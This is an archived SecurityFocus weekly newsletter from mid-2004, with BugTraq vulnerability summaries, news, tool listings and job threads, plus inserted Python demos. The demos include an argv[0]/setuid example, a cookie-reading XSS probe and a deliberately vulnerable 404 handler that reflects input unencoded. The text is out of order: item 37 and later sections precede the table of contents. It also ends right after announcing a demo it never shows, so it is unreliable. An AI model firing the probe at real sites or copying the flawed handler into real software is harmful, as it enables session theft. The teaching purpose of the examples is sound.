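    A setuid binary receives argv[0] exactly the same way, which is why
    resolve_target_unsafe() hands control to the caller.
    """
    proc = subprocess.run(["/tmp/evil", "-c", "echo $0"],
                          executable="/bin/sh", capture_output=True, text=True)
    return proc.stdout.strip()


if __name__ == "__main__":
    print("shell saw argv[0] =", caller_chosen_argv0())
    print("unsafe:", resolve_target_unsafe("/tmp/evil/ispyd"))
    print("safe:  ", resolve_target_safe("/tmp/evil/ispyd"))
```

The hardened version also drops privileges or uses a fixed absolute path in the exec call itself; allowlisting the name only matters because the directory is no longer the caller's to choose.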
37. SCI Photo Chat Server Cross-Site Scripting Vulnerability
BugTraq ID: 10648
Remote: Yes
Date Published: Jul 02 2004
Relevant URL: http://www.securityfocus.com/bid/10648
Summary:
SCI Photo Chat is reported susceptible to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input.
The web server component of SCI Chat server will display an error message when it receives an HTTP request for an invalid file. This error message includes the complete unsanitized content of the original request.
A remote attacker can exploit this issue by creating a malicious link to the vulnerable application that includes hostile HTML and script code. If this link were followed by an unsuspecting user, the hostile code may be rendered in their web browser in the security context of the vulnerable site. This may allow for theft of cookie-based authentication credentials or other attacks.
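The SCI Photo Chat error page is the most explicit of this week's reflected cross-site scripting reports (vBulletin, Cart32, CuteNews, PowerPortal and Netegrity IdentityMinder are the same class through a parameter rather than the request path): a server echoes part of the request into HTML without encoding it. The following is an added example, not code from any of those products. It builds the flawed 404 page beside the encoded one and includes the probe a tester would send and the check that decides whether the reflection survived unencoded.

```python
import html
from urllib.parse import quote, unquote

# Constructed probe: what a tester puts in the request path or an 'id'-style
# parameter to see whether it is reflected without encoding.
PROBE = "<script>alert(document.cookie)</script>"


def error_page_vulnerable(request_target):
    """404 handler that echoes the decoded request into the page (the flawed pattern)."""
    return ("<html><body><h1>404 Not Found</h1>"
            "<p>The requested resource %s was not found.</p></body></html>"
            % unquote(request_target))


def error_page_safe(request_target):
    """Same handler, encoding the untrusted value for an HTML text context.

    quote=True also encodes ' and ", so the same value is safe inside a
    quoted attribute; JavaScript or URL contexts need their own encoders.
    """
    return ("<html><body><h1>404 Not Found</h1>"
            "<p>The requested resource %s was not found.</p></body></html>"
            % html.escape(unquote(request_target), quote=True))


def encoded_request(path, probe=PROBE):
    """URL-encode the probe the way a browser sends it in a link."""
    return path + quote(probe, safe="")


def reflected_unencoded(response_body, probe=PROBE):
    """True if the probe came back verbatim, i.e. the reflection is exploitable as sent."""
    return probe in response_body
```

Against a live server the same check is: request the encoded probe, and grep the body for the literal `<script>` tag. A body containing `&lt;script&gt;` instead means the server encoded it, which is what the fixed versions of these products should return.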
III. SECURITYFOCUS NEWS ARTICLES
--------------------------------
1. Gates Defends Microsoft Patch Efforts
By: Patrick Gray
Microsoft chairman downplays the role that unpatched vulnerabilities played in last week's Russian hack attacks.
http://www.securityfocus.com/news/9004
2. Wi-fi hopper guilty of cyber-extortion
By: Kevin Poulsen
FBI agents initially traced threats to a suburban dentist's office, and other spots with unsecured wireless networks.
http://www.securityfocus.com/news/8991
3. Feds urge secrecy over network outages
By: Kevin Poulsen
The Department of Homeland Security wants details of major service outages kept out of the public eye.
http://www.securityfocus.com/news/8966
4. Bagle source code unleashed
By: John Leyden, The Register
Virus writers are distributing viral source code with the latest version of the Bagle virus series, Bagle-AD. Much like its 29 predecessors, Bagle-AD is a mass-mailing worm that is packed using UPX file compression.
http://www.securityfocus.com/news/9059
5. IE workaround a non-starter
By: John Leyden, The Register
Doubts have been raised about the effectiveness of a workaround issued by Microsoft to guard against a potentially devastating vulnerability in IE. Left unchecked the flaw creates a means for hackers to turn popular websites into conduits for viral transmission.
http://www.securityfocus.com/news/9054
6. Spanish Zombie PC virus author jailed
By: John Leyden, The Register
A Spanish man was sent to jail for two years last week after being convicted of virus writing. Óscar López Hinarejos, 26, was also ordered to pay compensation to his victims for writing the Cabronator Trojan.
http://www.securityfocus.com/news/9053
IV. SECURITYFOCUS TOP 6 TOOLS
-----------------------------
1. mod_auth_nufw 1.0.1
By: Vincent Deffontaines
Relevant URL: http://freshmeat.net/redir/modauthnufw/51307/url_homepage/article.php3
Platforms:
Summary:
mod_auth_nufw is a Single Sign On Apache module which performs secure user identification and authentication, based on the Nufw firewalling suite. Nufw marks all connections of a network with a unique UserID. This module takes advantage of that mark and uses it to transparently identify and authenticate users requiring access to an Apache server.
2. Ettercap v0.7.0 pre2
By: ALoR <alor (at) users.sourceforge (dot) net [email concealed]>
Relevant URL: http://ettercap.sourceforge.net/
Platforms: FreeBSD, Linux, MacOS, NetBSD, Windows 2000, Windows NT, Windows XP
Summary:
Ettercap is a network sniffer/interceptor/logger for ethernet LANs. It supports active and passive dissection of many protocols (even ciphered ones, like SSH and HTTPS). Data injection into an established connection and filtering on the fly are also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN.
3. Free CPM Cellular Passwords Manager 1.0
Summary:
Enter our downloads page to find the free Cellular Passwords Manager, a J2ME program that manages all your site/account passwords and IDs. The program is PIN protected and simple menu driven.
This program is part of the CAT Cellular Authentication Token. The CAT manages the OTPs and fixed ID/password accounts.
4. DumpSIS.pl 0.81
By: Jimmy Shah
Relevant URL: http://www.geocities.com/jfldars/DumpSIS.zip
Platforms: Perl (any system supporting perl)
Summary:
Symbian SIS file dumping utility that allows for analysis of potential malware without actual installation of files.
It has been field tested by various antivirus researchers, who used it to help analyze the recent Symbian Cabir worm.
5. CifsPwScanner 1.0.3
Summary:
A CIFS/SMB password scanner based on the jcifs implementation. The scanner and jcifs are both 100% pure Java, making it possible to run the scanner on several different platforms.
6. Wasabi 0.2
By: Andrea Barisani
Relevant URL: http://www.gentoo.org/proj/en/infrastructure/wasabi
Platforms: Perl (any system supporting perl)
Summary:
Wasabi is a log monitoring program designed to watch a log file for lines matching user-defined regular expressions and report on the matches. Each regular expression is assigned to a queue, which has an alert interval and a list of mail recipients.
A queue can be set to send a notification as soon as a log line is assigned to it, or to send periodic reports.
Additionally, uninteresting fields in the log lines (such as PID numbers) can be masked with the standard regular ex
V. SECURITYJOBS LIST SUMMARY
----------------------------
1. IT Auditor vacancy UK (Thread)
Relevant URL: http://www.securityfocus.com/archive/77/368053
2. Seeking Information Security Professionals in NYC (Thread)
Relevant URL: http://www.securityfocus.com/archive/77/368030
3. Do you seek an Information Security Expert? (Thread)
Relevant URL:
4. just running tcpdump makes promisc mode? (Thread)
Relevant URL: http://www.securityfocus.com/archive/91/367997
XI. UNSUBSCRIBE INSTRUCTIONS
----------------------------
To unsubscribe send an e-mail message to sf-news-unsubscribe (at) securityfocus (dot) com [email concealed] from the subscribed address. The contents of the subject or message body do not matter. You will receive a confirmation request message to which you will have to answer. Alternatively you can also visit http://www.securityfocus.com/newsletters and unsubscribe via the website.
If your email address has changed email listadmin (at) securityfocus (dot) com [email concealed] and ask to be manually removed.
XII. SPONSOR INFORMATION
-----------------------
This issue sponsored by: FaceTime
Free Webinar! Enterprise IM: How IT Managers Can Survive. Featured Speaker:
Nate Root, Senior Analyst, Forrester Research. IT directors and security
managers will gain new insights to balance compliance and security risks.
Highlights an integrated solution from FaceTime Communications and MSN
Messenger Connect for Enterprises. Ideal for financial services,
healthcare, energy companies and other regulated organizations.
View the webinar now!
http://www.securityfocus.com/sponsor/FaceTime_sf-news_040706
------------------------------------------------------------------------
I. FRONT AND CENTER
1. Close the E-Mail Wiretap Loophole
2. Multi-Layer Intrusion Detection Systems
3. The Allure and Curse of Complexity
II. BUGTRAQ SUMMARY
1. vBulletin newreply.php Cross-Site Scripting Vulnerability
2. WebSoft HelpDesk PRO SQL Injection Vulnerability
3. WebSoft Infinity WEB SQL Injection Vulnerability
4. MPlayer GUI File Name Buffer Overflow Vulnerability
5. PHPMyFamily Authentication Bypass Vulnerability
6. McMurtrey/Whitaker & Associates Cart32 GetLatestBuilds Scrip...
7. CGIScript.net CSFAQ Script Path Disclosure Vulnerability
8. Apache ap_escape_html Memory Allocation Denial Of Service Vu...
9. CuteNews Multiple Cross-site Scripting Vulnerabilities
10. D-Link AirPlus DI-614+, DI-624, and DI-604 DHCP Server Flood...
11. PowerPortal Multiple Input Validation Vulnerabilities
12. Sun Java Runtime Environment Font Object Assertion Failure D...
13. BEA WebLogic Server And WebLogic Express Application Role Un...
14. Popclient Email Message Buffer Overflow Vulnerability
15. I-Mall Commerce I-mall Script Remote Command Execution Vulne...
16. Microsoft Internet Explorer Cross-Domain Frame Loading Vulne...
17. Dr. Web Unspecified Buffer Overflow Vulnerability
18. phpMyAdmin Multiple Input Validation Vulnerabilities
19. HP-UX ObAM WebAdmin Unspecified Unauthorized Access Vulnerab...
20. HP-UX Undisclosed ARPA Transport Local Denial Of Service Vul...
21. Linux Kernel Sbus PROM Driver Multiple Integer Overflow Vuln...
22. Pavuk Remote Stack-Based Buffer Overrun Vulnerability
23. Linux Kernel IPTables Sign Error Denial Of Service Vulnerabi...
24. HP-UX Netscape Browser Multiple Vulnerabilities
25. Juniper JUNOS Packet Forwarding Engine IPv6 Denial of Servic...
26. Open WebMail Vacation.PL Remote Command Execution Variant Vu...
27. ZyXEL Prestige Router Authentication Password Field Remote D...
28. New Atlanta ServletExec Unauthorized Access Vulnerability
29. RSBAC Jail SUID And SGID File Creation Vulnerability
30. IBM Lotus Domino Server Web Access Malicious Email View Remo...
31. IBM Lotus Domino IMAP Quota Changing Vulnerability
32. FreeBSD Linux Binary Compatibility Memory Access Vulnerabili...
33. Esearch eupdatedb Symbolic Link Vulnerability
34. Netegrity IdentityMinder Multiple Cross-Site Scripting Vulne...
35. Qbik WinGate Information Disclosure Vulnerability
36. IBM Informix I-Spy Local Privilege Escalation Vulnerability
37. SCI Photo Chat Server Cross-Site Scripting Vulnerability
III. SECURITYFOCUS NEWS ARTICLES
1. Gates Defends Microsoft Patch Efforts
2. Wi-fi hopper guilty of cyber-extortion
3. Feds urge secrecy over network outages
4. Bagle source code unleashed
5. IE workaround a non-starter
6. Spanish Zombie PC virus author jailed
IV. SECURITYFOCUS TOP 6 TOOLS
1. mod_auth_nufw 1.0.1
2. Ettercap v0.7.0 pre2
3. Free CPM Cellular Passwords Manager 1.0
4. DumpSIS.pl 0.81
5. CifsPwScanner 1.0.3
6. Wasabi 0.2
V. SECURITYJOBS LIST SUMMARY
1. IT Auditor vacancy UK (Thread)
2. Seeking Information Security Professionals in NYC (Thread)
3. Do you seek an Information Security Expert? (Thread)
4. Sr. Associate - Threat & Vulnerability Management - ... (Thread)
5. New to security field (Thread)
6. Network Security Engineer, NYC (Thread)
7. [WANT] Security or Computer/Tech Support Position (Thread)
8. Security Engineer job opp. @ Reactivity Inc., Belmo... (Thread)
9. Seeking security developers (Thread)
10. Security SW- Tech support- Cupertino, CA- ArcSight (Thread)
11. Information Security with Microsoft emphasis - CA, I... (Thread)
12. Jr. Level Perimeter Security - New York (Thread)
13. Solutions Consultant (SE) - Bay Area (Thread)
14. Security Architect - Boston (Thread)
15. Summertime Positions in Heidelberg, Germany (Thread)
16. MITRE - Information Assurance Architect - Hanover, M... (Thread)
17. Security Consultants: Wash. D.C. or CA- ArcSight (Thread)
18. Security Architect for Federal.- Wash D.C. ArcSight (Thread)
19. WEST COAST SALES ENGINEER (Thread)
20. Security Engineer - LOS ANGELES, CA - Financial Ins... (Thread)
21. Director / VP Business Development--Network Securit... (Thread)
22. IT Security Architect required in the UK (Thread)
VI. INCIDENTS LIST SUMMARY
1. Remote registry changes from an ISA server (Thread)
2. Unknown Malware found csdiv.dll (Thread)
3. Scob infection statistics, etc.. (Thread)
VII. VULN-DEV RESEARCH LIST SUMMARY
NO NEW POSTS FOR THE WEEK 2004-06-29 to 2004-07-06.
VIII. MICROSOFT FOCUS LIST SUMMARY
1. supressing IE (Thread)
2. Non Admin Rights + Visual Studio (Thread)
3. Consumer Security Web Site (Thread)
4. Administrivia: Out of Office Autoreplies (Thread)
5. Article Announcement: Redmond's Butterfly Effect (Thread)
6. SecurityFocus Microsoft Newsletter #195 (Thread)
7. RE: Consumer Security Web Site (Thread)
IX. SUN FOCUS LIST SUMMARY
1. secure NFS problem (Thread)
X. LINUX FOCUS LIST SUMMARY
1. Weird! (Thread)
2. Last login missing (Thread)
3. Error installing Clamav? (Thread)
4. just running tcpdump makes promisc mode? (Thread)
XI. UNSUBSCRIBE INSTRUCTIONS
XII. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. Close the E-Mail Wiretap Loophole
By Mark Rasch
Some pretty sleazy operators are slipping through a hole in a federal
wiretap law that arguably leaves your e-mail unprotected from snooping.
http://www.securityfocus.com/columnists/253
2. Multi-Layer Intrusion Detection Systems
By Nathan Einwechter
This article discusses framework for a mIDS, a system that brings together
many layers of technology into a single monitoring and analysis engine,
from integrity monitoring software like Tripwire to system logs, IDS logs,
and firewall logs.
http://www.securityfocus.com/infocus/1788
3. The Allure and Curse of Complexity
By Jason Miller
The curse of complexity is the bane of every security administrator, so
UNIX users take your pick: would you like BSD or Linux?
http://www.securityfocus.com/columnists/252
II. BUGTRAQ SUMMARY
-------------------
1. vBulletin newreply.php Cross-Site Scripting Vulnerability
BugTraq ID: 10612
Remote: Yes
Date Published: Jun 26 2004
Relevant URL: http://www.securityfocus.com/bid/10612
Summary:
vBulletin is reportedly affected by a cross-site scripting vulnerability in the newreply.php script. This issue is due to a failure of the application to properly sanitize user-supplied URI input.
An attacker may exploit this issue to have malicious HTML or script code executed in the browser of an unsuspecting user and within the context of a visited web site. This may potentially lead to theft of cookie based authentication credentials, other attacks are also possible.
2. WebSoft HelpDesk PRO SQL Injection Vulnerability
BugTraq ID: 10613
Remote: Yes
Date Published: Jun 26 2004
Relevant URL: http://www.securityfocus.com/bid/10613
Summary:
Reportedly WebSoft HelpDesk PRO is affected by an SQL injection vulnerability. This issue is due to a failure of the application to properly sanitize user supplied URI input.
It is likely that this issue is related to the issue discussed in the vulnerability WebSoft Infinity WEB SQL Injection Vulnerability (BID 10614). This BID will be updated when information becomes available.
An attacker might leverage this issue to inject malicious SQL queries or alter existing ones. This would allow the attacker to manipulate database queries to bypass authentication mechanisms; other attack might also be possible.
3. WebSoft Infinity WEB SQL Injection Vulnerability
BugTraq ID: 10614
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10614
Summary:
Reportedly WebSoft Infinity WEB is affected by an SQL injection vulnerability. This issue is due to a failure of the application to properly sanitize user supplied URI input.
It is likely that this issue is related to the issue discussed in the vulnerability WebSoft HelpDesk PRO SQL Injection Vulnerability (BID 10613). This BID will be updated when information becomes available.
An attacker might leverage this issue to inject malicious SQL queries or alter existing ones. This would allow the attacker to manipulate database queries to bypass authentication mechanisms; other attack might also be possible.
4. MPlayer GUI File Name Buffer Overflow Vulnerability
BugTraq ID: 10615
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10615
Summary:
It has been reported that MPlayer when used with the graphical user interface (GUI) is affected by a buffer overflow vulnerability. This issue is due to a failure of the application to properly handle user-supplied strings when copying them into finite buffers.
Successful exploitation would immediately produce a denial of service condition in the affected process. This issue may also be leveraged to execute code on the affected system within the security context of the user running the vulnerable process.
5. PHPMyFamily Authentication Bypass Vulnerability
BugTraq ID: 10616
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10616
Summary:
phpmyfamily is prone to an authentication bypass vulnerability.
This issue reportedly occurs when the registers_globals PHP configuration directive is enabled. Exploitation could permit an unauthorized remote user to edit site content.
6. McMurtrey/Whitaker & Associates Cart32 GetLatestBuilds Scrip...
BugTraq ID: 10617
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10617
Summary:
Cart32 is reported prone to a cross-site scripting vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data.
A remote attacker can exploit this issue by creating a malicious link to the vulnerable application that includes hostile HTML and script code. If a user follows this link, the hostile code renders in the web browser of the victim user. Theft of cookie-based authentication credentials and other attacks is possible.
Cart32 version 5.0 and prior are considered prone to this issue.
7. CGIScript.net CSFAQ Script Path Disclosure Vulnerability
BugTraq ID: 10618
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10618
Summary:
A vulnerability has been identified in the application that may allow an attacker to disclose the installation path.
Successful exploitation of this vulnerability may allow an attacker to gain sensitive information about the file system that may aid in launching more direct attacks against the system.
All current versions of csFAQ are considered vulnerable to this issue.
8. Apache ap_escape_html Memory Allocation Denial Of Service Vu...
BugTraq ID: 10619
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10619
Summary:
Apache Web Server is reportedly affected by a memory allocation based denial of service vulnerability. This issue is due to a failure of the server to handle excessivley long HTTP header strings.
This issue would allow an attacker to cause the affected application to crash, denying service to legitimate users.
Although Apache version 2.0.49 reportedly affected by this issue, it is likely that earlier versions are affected as well.
9. CuteNews Multiple Cross-site Scripting Vulnerabilities
BugTraq ID: 10620
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10620
Summary:
It is reported that CuteNews is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input.
The problems present themselves when malicious HTML and script code is sent to the application through the 'id' parameter of the multiple scripts.
These issues could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were followed, the hostile code may be rendered in the web browser of the victim user.
10. D-Link AirPlus DI-614+, DI-624, and DI-604 DHCP Server Flood...
BugTraq ID: 10621
Remote: Yes
Date Published: Jun 27 2004
Relevant URL: http://www.securityfocus.com/bid/10621
Summary:
The D-Link DI-614+, DI-624, and DI-604 are reported susceptible to a denial of service vulnerability in their DHCP service.
By flooding the DHCP service with valid DHCP requests, the device will reportedly consume all available memory and eventually reboot.
An attacker may be able to deny service to legitimate users of an affected device by repeatedly causing the device to reboot.
The DI-614+ with firmware revision 2.30, and the DI-604 with unknown firmware were reported vulnerable. The DI-624 Revision B was also confirmed susceptible.
11. PowerPortal Multiple Input Validation Vulnerabilities
BugTraq ID: 10622
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10622
Summary:
PowerPortal is reported prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application:
PowerPortal is prone to multiple cross-site scripting vulnerabilities. These cross-site scripting issues can permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If a user follows the malicious link, the attacker-supplied code executes in the Web browser of the victim computer. This attack can allow for theft of cookie-based authentication credentials and other attacks.
Additionally, PowerPortal is prone to an information disclosure vulnerability. It is reported that a remote attacker may reveal directory listings, by supplying directory traversal sequences to the 'modules.php' script.
The information disclosure vulnerability may be employed by the attacker in order to reveal potentially sensitive information regarding the layout of the filesystem on the affected computer.
12. Sun Java Runtime Environment Font Object Assertion Failure D...
BugTraq ID: 10623
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10623
Summary:
The Sun Java Runtime Environment Font object is reportedly vulnerable to an assertion failure denial of service vulnerability. This issue is due to a failure of the process to handle exceptional conditions when processing font objects.
This issue is reported to affect Java Runtime Environment versions 1.4.1 through 1.4.2; it is likely however that other versions are also affected. This issue will crash Internet browsers running an affected Java plug-in as well.
This issue may be exploited by an attacker to cause a vulnerable application, as well as all processes spawned from the application, to crash, denying service to legitimate users. Due to the scope of the crash, data loss may occur.
13. BEA WebLogic Server And WebLogic Express Application Role Un...
BugTraq ID: 10624
Remote: Yes
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10624
Summary:
WebLogic Server And WebLogic Express are affected by a vulnerability that may unauthorized access to application roles. This issue is due to a failure of the application to properly implement the Servlet 2.3 specification, facilitating unauthorized access.
It should be noted that this issue only arises when a web application is built using the '*' specifier within the '<role-name>' tags, resources are defined to be protected by the '*' specifier, and users exist without explicitly defined roles. Due to the circumstantial nature of this issue, exploitation may be unlikely.
This issue would allow an attacker to carry out actions outside of the defined roles; potentially leading to unauthorized access or other attacks.
14. Popclient Email Message Buffer Overflow Vulnerability
BugTraq ID: 10625
Remote: Yes
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10625
Summary:
It has been reported that popclient is affected by an off by one buffer overflow vulnerability. This issue is due to a failure of the application to properly manage static stack-based buffers.
Successful exploitation of this issue may cause a denial of service condition in the affected application; it is unlikely that this issue could be leveraged to execute code, however it may be possible.
15. I-Mall Commerce I-mall Script Remote Command Execution Vulne...
BugTraq ID: 10626
Remote: Yes
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10626
Summary:
i-mall.cgi is reported prone to a remote arbitrary command execution vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data and may allow a remote attacker to pass arbitrary shell commands to the vulnerable script.
16. Microsoft Internet Explorer Cross-Domain Frame Loading Vulne...
BugTraq ID: 10627
Remote: Yes
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10627
Summary:
Microsoft Internet Explorer is reported prone to a cross-domain frame loading vulnerability. It is reported that if the name of a frame rendered in a target site is known, then an attacker may potentially render arbitrary HTML in the frame of the target site.
An attacker may exploit this vulnerability to spoof an interface of a trusted web site.
17. Dr. Web Unspecified Buffer Overflow Vulnerability
BugTraq ID: 10628
Remote: Yes
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10628
Summary:
It has been reported that an unspecified buffer overflow vulnerability exists in Dr. Web.
Users of Dr. Web have reported seeing this message logged to syslog by ProPolice on OpenBSD computers:
drwebd: stack overflow in function int scanMail(int, time_t *, int, int, const char *)
An unspecified buffer overflow in the scanMail() function may be exploitable. If it is, attempts to exploit it may result in the affected application crashing. This may also be leveraged to execute arbitrary code in the context of the Dr. Web process.
As more information is known, this BID will be updated.
18. phpMyAdmin Multiple Input Validation Vulnerabilities
BugTraq ID: 10629
Remote: Yes
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10629
Summary:
phpMyAdmin is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application:
It is reported that a malicious attacker can add arbitrary servers to phpMyAdmin. By constructing a URI request for the phpMyAdmin 'left.php' script an attacker may specify and add an arbitrary SQL server.
A remote attacker may exploit this vulnerability to replace server configurations and as a result introduce a malicious SQL server into the phpMyAdmin controlled server list.
phpMyAdmin is reported prone to a remote PHP code execution vulnerability. It is reported that a malicious database table name beginning with "'" will escape the quotes in a PHP eval() statement and will thereby permit an attacker to execute arbitrary PHP code.
19. HP-UX ObAM WebAdmin Unspecified Unauthorized Access Vulnerab...
BugTraq ID: 10630
Remote: Yes
Date Published: Jun 28 2004
Relevant URL: http://www.securityfocus.com/bid/10630
Summary:
HP-UX ObAM WebAdmin is reported prone to an unspecified vulnerability. This issue may allow a remote attacker to gain unauthorized access to a vulnerable computer.
HP-UX B.11.11 is reported prone to this issue.
Due to a lack of details, further information is not available at the moment. This BID will be updated as more information becomes available.
20. HP-UX Undisclosed ARPA Transport Local Denial Of Service Vul...
BugTraq ID: 10631
Remote: No
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10631
Summary:
HP-UX is reported vulnerable to an undisclosed local denial of service vulnerability.
Reportedly, there exists a flaw in HP-UX's ARPA transport which could be leveraged by a local user to crash the computer.
21. Linux Kernel Sbus PROM Driver Multiple Integer Overflow Vuln...
BugTraq ID: 10632
Remote: No
Date Published: Jun 29 2004
Relevant URL: http://www.securityfocus.com/bid/10632
Summary:
It is reported that the OpenPROM Linux kernel driver contains multiple integer overflow vulnerabilities.
Two vulnerabilities are reported to exist in the OpenPROM driver, both involve overflowing an integer value. These values are used to allocate kernel memory, and then subsequently to copy data into the kernel. This could lead to overwriting large amounts of kernel memory.
These vulnerabilities could lead to a system crash, or possible code execution in the context of the kernel.
Some versions of the Linux kernel are vulnerable to both overflows, other versions are only susceptible to one. Kernel version 2.6.6 does not appear to be vulnerable.
22. Pavuk Remote Stack-Based Buffer Overrun Vulnerability
BugTraq ID: 10633
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10633
Summary:
Pavuk is reported prone to a remote buffer overrun vulnerability. It is reported that the issue exists due to a lack of boundary checks performed on third party data, that is received from remote HTTP servers, before the data is copied into a finite stack-based buffer.
Ultimately a remote malicious site may exploit this condition to execute arbitrary code in the context of the user who is running the vulnerable Pavuk software.
23. Linux Kernel IPTables Sign Error Denial Of Service Vulnerabi...
BugTraq ID: 10634
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10634
Summary:
It has been reported that the Linux kernel is affected by a denial of service vulnerability in the iptables implementation. This issue is due to a failure of iptables to handle certain TCP packet header values.
An attacker can exploit this issue to cause the iptables implementation to consume all CPU resources due to an infinite loop, denying service to legitimate users.
24. HP-UX Netscape Browser Multiple Vulnerabilities
BugTraq ID: 10635
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10635
Summary:
HP-UX Netscape browser is reported prone to multiple vulnerabilities. These vulnerabilities can allow a remote attacker to carry out attacks such as denial of service, information disclosure, and unauthorized access to a vulnerable computer.
These issues affect Netscape for HP-UX B.11.00, B.11.11, B.11.22, and B.11.23.
25. Juniper JUNOS Packet Forwarding Engine IPv6 Denial of Servic...
BugTraq ID: 10636
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10636
Summary:
Juniper routers running the JUNOS operating system are reported prone to a denial of service vulnerability due to memory exhaustion. An attacker can cause a persistent denial of service condition by repeatedly sending certain IPv6 packets to a router.
This issue affects the JUNOS Packet Forwarding Engine IPv6 branch released after February 24, 2004. All Juniper Networks M-series and T-series routing platforms with IPv6 support are also prone to this issue.
26. Open WebMail Vacation.PL Remote Command Execution Variant Vu...
BugTraq ID: 10637
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10637
Summary:
A vulnerability is reported in Open WebMail that allows a remote attacker to execute arbitrary commands on a vulnerable host.
Exploitation of the vulnerability could allow a non-privileged user to remotely execute arbitrary commands in the context of the web server that is hosting the vulnerable application.
This vulnerability is reported to affect all versions of Open WebMail released before 29/06/2004.
27. ZyXEL Prestige Router Authentication Password Field Remote D...
BugTraq ID: 10638
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10638
Summary:
ZyXEL Prestige routers are reported prone to a remote denial of service vulnerability. The issue is reported to exist due to a lack of boundary checks performed on password string data handled by the device authentication interface.
A remote attacker who has access to the authentication interface of the affected appliance may trigger a device reset at will, effectively denying service to legitimate users.
28. New Atlanta ServletExec Unauthorized Access Vulnerability
BugTraq ID: 10639
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10639
Summary:
It has been reported that New Atlanta ServletExec is affected by an unauthorized access vulnerability; fixes are available. This issue is due to an access validation error.
This issue would allow an attacker to upload and execute files on the affected computer, facilitating unauthorized interactive access as well as other attacks. This issue might also be leveraged to cause a denial of service condition in the affected server.
29. RSBAC Jail SUID And SGID File Creation Vulnerability
BugTraq ID: 10640
Remote: No
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10640
Summary:
The process jail feature of RSBAC reportedly improperly allows files to be created with SUID and SGID attributes.
These files can then be used to escalate the privileges inside the jail. This may allow for further attacks and possible system compromises.
Versions 1.2.2 and 1.2.3 are reported to be vulnerable to this issue. A patch has been released by the vendor.
30. IBM Lotus Domino Server Web Access Malicious Email View Remo...
BugTraq ID: 10641
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10641
Summary:
Lotus Domino Server is reported prone to a remote denial of service vulnerability. The issue is reported to occur when a malicious email received by the affected server is opened by a client through the Domino Web Access interface.
A remote attacker may exploit this condition to deny Lotus Domino service to legitimate users.
31. IBM Lotus Domino IMAP Quota Changing Vulnerability
BugTraq ID: 10642
Remote: Yes
Date Published: Jun 30 2004
Relevant URL: http://www.securityfocus.com/bid/10642
Summary:
IBM Lotus Domino server is reported to improperly allow users to alter their own mail storage quota values.
A user's mailbox is assigned a quota to limit the amount of data that can be consumed by email on the server. This quota is assigned by the administrator of the application.
An attacker could use this vulnerability to raise their mailbox quota to a very large value and then fill the mail server's storage device. The result is a denial of service condition: once the disk is full, no new mail can be stored.
Domino versions 6.5.0 and 6.5.1 are reported vulnerable to this issue.
32. FreeBSD Linux Binary Compatibility Memory Access Vulnerabili...
BugTraq ID: 10643
Remote: No
Date Published: Jul 01 2004
Relevant URL: http://www.securityfocus.com/bid/10643
Summary:
It has been reported that FreeBSD is affected by a memory access vulnerability in its Linux binary compatibility layer. This issue is due to a programming error that causes certain memory to be accessed without proper validation.
This issue would allow an attacker to disclose and overwrite kernel memory, resulting in information disclosure, privilege escalation and potential denial of service.
33. Esearch eupdatedb Symbolic Link Vulnerability
BugTraq ID: 10644
Remote: No
Date Published: Jul 01 2004
Relevant URL: http://www.securityfocus.com/bid/10644
Summary:
It has been reported that eupdatedb, an esearch utility, is affected by a symbolic link vulnerability. This issue is due to a failure of the application to safely handle temporary file creation: a predictable temporary file name is opened without checking whether the path already exists.
An attacker who plants a symbolic link at that name can leverage this vulnerability to create an arbitrary file with the permissions of the unsuspecting user who ran the vulnerable utility, facilitating a number of possible attacks.
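The pattern behind this class of bug, shown as an added example rather than esearch's own code: a predictable temporary name opened with O_CREAT|O_TRUNC follows an attacker-planted symlink and clobbers its target, while O_CREAT|O_EXCL refuses a pre-existing path (POSIX requires EEXIST even when that path is a symlink). The directory, file names and contents are constructed for the demo; it needs a POSIX system with a writable /tmp or current directory.

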